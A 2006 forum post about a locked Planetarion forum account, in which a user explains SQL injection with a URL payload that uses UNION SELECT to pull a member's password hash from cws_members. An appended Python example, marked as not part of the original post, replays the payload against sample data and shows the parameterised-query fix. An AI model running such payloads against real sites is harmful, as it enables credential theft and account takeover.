12 Jun 2006, 11:18   #89
Androme
☆ ♥ 
Join Date: Jan 2003
Posts: 3,489
Re: Account on Planetarion Forums locked out

If I was to make use of an SQL injection it means I can insert/execute commands directly into the database - for example, in a URL I could do
Code:
pirate.pa.forum/index.php?par=2%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=1
It's powerful enough that I can bypass the actual login process based on a hash and its associated memberid - and thus, gain complete access to a forum.
__________________
R3: LegioN (came #32) || R4: BlueTuba
R5: WolfPack Order || R6: Wolfpack
R7: Fury
----------retired-------
R52-R55: Apprime
R56-R57: FaceLess
R58-60: Apprime/Ultores
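The behaviour described in the post above, shown next to the fix, as an added example that is not part of the original post or the forum's code. It assumes an in-memory SQLite database as a stand-in for the forum's database and a hypothetical eight-column `topics` table; only `cws_members`, `member_id`, `password` and the `par` value come from the post.

```python
import sqlite3
from urllib.parse import unquote

# The `par` value from the URL in the post, copied as-is (still URL-encoded).
PAGE_PAR = ("2%20UNION%20SELECT%20null,null,null,null,null,null,password,null"
            "%20FROM%20cws_members%20WHERE%20member_id=1")

def make_db():
    """Constructed sample data; `topics` and its columns are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE topics (id INTEGER, c2, c3, c4, c5, c6, body TEXT, c8);
        CREATE TABLE cws_members (member_id INTEGER, password TEXT);
        INSERT INTO topics VALUES (2, 0, 0, 0, 0, 0, 'Forum rules', 0);
        INSERT INTO cws_members VALUES (1, 'CONSTRUCTED-HASH');
    """)
    return db

def lookup_concatenated(db, par):
    # Before: the request value is pasted into the SQL text, so the database
    # parses everything after "2" as part of the statement.
    return db.execute("SELECT * FROM topics WHERE id = " + par).fetchall()

def lookup_bound(db, par):
    # After: the value is bound to a placeholder and is only ever compared
    # against `id` as data; it never reaches the SQL parser.
    return db.execute("SELECT * FROM topics WHERE id = ?", (par,)).fetchall()

def leaks_password(rows):
    # True if any returned row carries the members-table value.
    return any("CONSTRUCTED-HASH" in row for row in rows)

if __name__ == "__main__":
    db = make_db()
    par = unquote(PAGE_PAR)
    print("concatenated leaks:", leaks_password(lookup_concatenated(db, par)))
    print("bound rows:", lookup_bound(db, par))
    print("bound, normal id:", lookup_bound(db, "2"))
```

With the bound query the whole decoded string is compared to `id` as one value, so the request returns no rows, while a normal `par=2` still works.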